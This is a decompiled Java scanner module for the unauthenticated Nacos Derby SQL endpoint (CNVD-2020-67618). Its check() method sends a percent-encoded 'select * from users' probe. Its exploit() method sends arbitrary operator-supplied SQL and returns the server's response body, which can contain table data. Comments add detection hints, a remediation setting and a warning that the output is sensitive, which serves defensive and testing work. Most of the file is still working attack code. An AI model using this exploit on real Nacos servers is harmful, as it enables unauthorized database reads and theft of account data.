package com.alibaba.nacos.exploit;

import com.alibaba.nacos.entity.ExecutionResult;
import com.alibaba.nacos.entity.Vulnerability;
import com.alibaba.nacos.httpclient.MyHttpRequests;
import com.alibaba.nacos.httpclient.MyHttpResponse;
import java.net.URLEncoder;

/* loaded from: input_file:com/alibaba/nacos/exploit/Alibaba_Nacos_derby_sql_injection.class */
/**
 * Scanner module for the unauthenticated Derby operations endpoint of the Nacos
 * config server ({@code /v1/cs/ops/derby}), tracked as CNVD-2020-67618.
 *
 * <p>Per the advisory text returned by {@link #getInfo()}, exposure depends on
 * whether the embedded Derby database is in use rather than on the Nacos version,
 * and the fix is to require authentication for the endpoint by setting
 * {@code nacos.core.auth.enabled=true} in {@code application.properties}.
 *
 * <p>Detection note: both requests built here are plain GETs to
 * {@code /v1/cs/ops/derby} carrying a {@code sql} query parameter. The fixed probe
 * percent-encodes every character of its statement, so access-log or WAF rules
 * should match on the path and parameter name, or decode before matching keywords.
 *
 * <p>Handling note: a positive result stores the full response body. For the fixed
 * probe that is the server's answer to a SELECT over the {@code users} table
 * (presumably account records; confirm against the deployment), so scan output
 * should be treated as sensitive data.
 *
 * <p>This file is decompiler output: the repeated name literal and the bare
 * {@code getClass()} calls in the decompiled form look like the compiler's
 * inlining of the constant {@code VulName} field, so the field is referenced
 * directly here.
 */
public class Alibaba_Nacos_derby_sql_injection implements Vulnerability {
    /** Display name reported in every {@link ExecutionResult} and in {@link #getInfo()}. */
    final String VulName = "Nacos Derby SQL注入漏洞 (CNVD-2020-67618)";

    /** Path and query-parameter prefix of the Derby operations endpoint. */
    private static final String DERBY_OPS_QUERY = "/v1/cs/ops/derby?sql=";

    /** Fixed probe statement, already percent-encoded (a SELECT over the users table). */
    private static final String PROBE_SQL_ENCODED =
            "%73%65%6c%65%63%74%20%2a%20%66%72%6f%6d%20%75%73%65%72%73";

    /** Substring of the response body that is taken as proof the statement ran. */
    private static final String SUCCESS_MARKER = "\"code\":200";

    /**
     * Builds the human-readable advisory: name, description, affected versions,
     * remediation and reference link (the reference link is empty in this module).
     *
     * @return the formatted advisory text
     */
    @Override
    public String getInfo() {
        final String template = "漏洞名称: %s\n\n"
                + "漏洞描述: %s\n\n"
                + "漏洞影响版本: %s\n\n"
                + "漏洞修复方案: %s\n\n"
                + "参考链接: %s\n\n";
        final String description = "config server中有个接口，没有做任何的鉴权，即可执行sql语句，可以泄漏全部数据";
        final String affected = "与Nacos版本无关,看是否使用了内置的Derby数据库";
        final String remediation = "对接口接口鉴权, 修改 nacos的application.properties配置文件nacos.core.auth.enabled=true，开启服务身份识别功能";
        final String reference = "";
        return String.format(template, VulName, description, affected, remediation, reference);
    }

    /**
     * Sends the fixed probe statement to the endpoint under {@code str}.
     *
     * @param str base URL of the Nacos instance; one trailing slash is tolerated
     * @return a positive result carrying the response body when the body contains
     *     the success marker, otherwise a negative result
     * @throws Exception declared by the interface; every exception raised here is
     *     caught and reported as a negative result
     */
    @Override
    public ExecutionResult check(String str) throws Exception {
        try {
            return runDerbyQuery(new MyHttpRequests(), str, PROBE_SQL_ENCODED);
        } catch (Exception ignored) {
            // Any failure (bad URL, transport error, missing body) is reported as "not vulnerable".
            return new ExecutionResult(false, VulName, null, null);
        }
    }

    /**
     * Sends the statement given in {@code strArr[0]}, URL-encoded as UTF-8, to the
     * endpoint under {@code str}.
     *
     * @param str base URL of the Nacos instance; one trailing slash is tolerated
     * @param strArr module arguments; only the first element is read
     * @return a positive result carrying the response body when the body contains
     *     the success marker, otherwise a negative result
     * @throws Exception declared by the interface; every exception raised here,
     *     including a missing first argument, is caught and reported as a
     *     negative result
     */
    @Override
    public ExecutionResult exploit(String str, String... strArr) throws Exception {
        try {
            return runDerbyQuery(new MyHttpRequests(), str, URLEncoder.encode(strArr[0], "UTF-8"));
        } catch (Exception ignored) {
            // Same policy as check(): failures collapse into a negative result.
            return new ExecutionResult(false, VulName, null, null);
        }
    }

    /**
     * Issues the GET request shared by {@link #check(String)} and
     * {@link #exploit(String, String...)} and classifies the response.
     *
     * @param client HTTP helper used to send the request
     * @param str base URL; a single trailing slash is stripped before the path is appended
     * @param encodedSql statement text, already encoded for use in a query string
     * @return positive result with the response body when the success marker is
     *     present, negative result otherwise
     * @throws Exception whatever the HTTP helper or the string handling raises;
     *     callers translate it into a negative result
     */
    private ExecutionResult runDerbyQuery(MyHttpRequests client, String str, String encodedSql)
            throws Exception {
        String base = str;
        if (str.endsWith("/")) {
            base = str.substring(0, str.length() - 1);
        }
        MyHttpResponse response =
                client.sendRequest(base + DERBY_OPS_QUERY + encodedSql, "GET", null, null, true);
        if (!response.getResponseBody().contains(SUCCESS_MARKER)) {
            return new ExecutionResult(false, VulName, null, null);
        }
        // The whole body is kept as evidence; it may hold table contents, so treat it as sensitive.
        return new ExecutionResult(true, VulName, response.getResponseBody(), null);
    }
}
